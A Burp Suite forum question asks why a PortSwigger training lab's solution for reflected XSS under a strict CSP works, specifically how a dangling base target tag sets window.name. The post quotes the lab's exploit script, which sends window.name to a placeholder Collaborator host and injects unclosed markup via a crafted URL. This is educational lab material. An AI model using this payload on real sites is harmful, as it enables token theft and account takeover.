Burp Suite User Forum

Login to post

Code explanation for Lab: Reflected XSS protected by very strict CSP, with dangling markup attack

Dom | Last updated: Apr 08, 2021 11:00AM UTC

Hi, I have got a quick question about the solution of the lab mentioned in the subject. I understand the context and the approach, I have come pretty close to the solution myself but just could not make it work. The base tag sets the target for the a tag (actually for all a tags except the ones that overwrite it), but the target attribute must also set the window.name for the exploit to work! Is this always true? I could not verify this with my tests and I didn't find an answer when searching for it. <script> if(window.name) { new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name); } else { location = 'https://your-lab-id.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://your-exploit-server-id.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27'; } </script> TL;DR : My guess on what is happening. When the victim visits the malicious site, the window.name is not set --> else case, the victim gets redirect to the vulnerable site and is presented a button Click Me, if he clicks, he is redirected back to the malicious site, this time the window.name is set by the target attribute (?!). The value of the window.name now contains the exfiltrated information through the dangling injection. Thanks in advance!

You need to Log in to post a reply. Or register here, for free.